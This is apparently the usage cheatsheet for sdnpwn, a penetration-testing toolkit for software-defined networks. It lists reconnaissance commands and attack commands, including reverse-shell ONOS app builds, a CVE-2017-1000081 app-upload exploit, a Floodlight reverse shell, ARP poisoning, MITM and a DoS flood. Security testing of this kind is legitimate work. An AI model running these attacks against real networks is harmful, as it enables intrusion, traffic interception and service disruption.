Get sdnpwn
The latest version of sdnpwn can be found on Github.
Now available on BlackArch Linux!
Getting Started
The basic usage of sdnpwn is like so:
./sdnpwn.py <module name> <options>
An article introducing sdnpwn and its basic usage can be found here.
Module Cheatsheet
Functionality in sdnpwn is separated into different modules. Each module is responsible for a particular attack or action. See below for example usage of each module.
Reconnaissance
- arpmon
./sdnpwn.py arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0
./sdnpwn.py arpmon -i eth0 -m map #Map MAC addresses to IP addresses
- sdn-detect
./sdnpwn.py sdn-detect #Test using default gateway with ARP traffic
./sdnpwn.py sdn-detect -t 192.168.0.29 -m icmp #Test using host 192.168.0.29 using ICMP traffic
./sdnpwn.py sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.
- controller-detect
./sdnpwn.py controller-detect -i eth0 --lldp #Test using observed LLDP messages at interface eth0
./sdnpwn.py controller-detect -t 192.168.0.3 #Test northbound interface of controller at 192.168.0.3
- of-scan
./sdnpwn.py of-scan -t 192.168.1.1 #Scan default ports 6633 and 6653 for OpenFlow service
./sdnpwn.py of-scan -t 192.168.1.1 -p 1000-10000 #Scan port range for OpenFlow service
Management
- help
./sdnpwn.py help #Print sdnpwn help
- mods
./sdnpwn.py mods #Print a list of all executable modules
./sdnpwn.py mods -s lfa #Search modules for a module with "lfa" in its name
./sdnpwn.py mods -n new-mod #Create a new module named "new-mod"
./sdnpwn.py mods -r new-mod #Remove module named "new-mod"
- info
./sdnpwn.py info test-mod #Print information for module named "test-mod"
- system
./sdnpwn.py system ifconfig #Run ifconfig command on the system
Attack
- lfa-relay
./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1
./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \
  --tunnel-local 192.168.70.1 --tunnel-remote 192.168.70.2 #Relay LLDP frames through a remote tunnel
- lfa-scapy
./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1
./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 --script mitm.py #Pass relayed traffic through a custom script
- lldp-replay
./sdnpwn.py lldp-replay -i eth0 -w lldpcap.cap #Capture LLDP frame to file lldpcap.cap
./sdnpwn.py lldp-replay -i eth0 -r lldpcap.cap #Replay LLDP frame from file lldpcap.cap
- host-location-hijack
./sdnpwn.py host-location-hijack --iface eth0 --target 192.168.56.7 #Hijack location of 192.168.56.7
- of-switch
./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf #Connect to controller at 192.168.1.1 on port 6653 using of-switch.conf configuration
./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -l 8888 #Open relay proxy on port 8888
./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -o eth0 #Output packet-out payloads to eth0
- of-gen
./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --hello #Send OF Hello message to 192.168.7.8:6633
./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 -c 1000 -d .001 --hello #Flood OF Hello messages
./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --packet-in --xid 0 --buffer-id 0 --in-port 1 \
  --reason action --total-length 65353 --data-scapy "Ether()/IP()/TCP()" #Send arbitrary packet-in message
- onos-app
./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell #Build netcat based reverse shell app from template
./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -c #Modify configuration for app before build
./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -k #Build app and keep source folder
- onos-app-upload
./sdnpwn.py onos-app-upload -t 192.168.23.100 -p 8181 -a apps/compiled_apps/securearp.oar #Exploit CVE-2017-1000081 to upload app from compiled apps folder
- floodlight-debug-autopwn
./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -l 127.0.0.1:8888 #Set up listener and get reverse shell on port 8888
./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -r #Do not set up a listener. Use this if you're using another program to listen for the shell
- dp-arp-poison
./sdnpwn.py dp-arp-poison -i eth0 -v 192.168.1.2 -t 192.168.1.3 -m de:ad:be:ef:ba:11 #Poison 192.168.1.3 in ARP cache of 192.168.1.2 with MAC of de:ad:be:ef:ba:11
- dp-mitm
./sdnpwn.py dp-mitm --iface eth0 --target1 192.168.1.2 --gateway #MITM connection from target to gateway
- phantom-host-scan
./sdnpwn.py phantom-host-scan --iface eth0 --target-ip 192.168.1.2 --ports 22,23 --phantom-ip 192.168.1.5 #Scan ports 22 and 23 using the phantom host scan
- phantom-storm
./sdnpwn.py phantom-storm --iface eth0 --target 192.168.1.0/24 --phantom-ip 192.168.1.5 --packets 1000 #Launch phantom storm DoS attack against network 192.168.1.0/24 with 1000 packets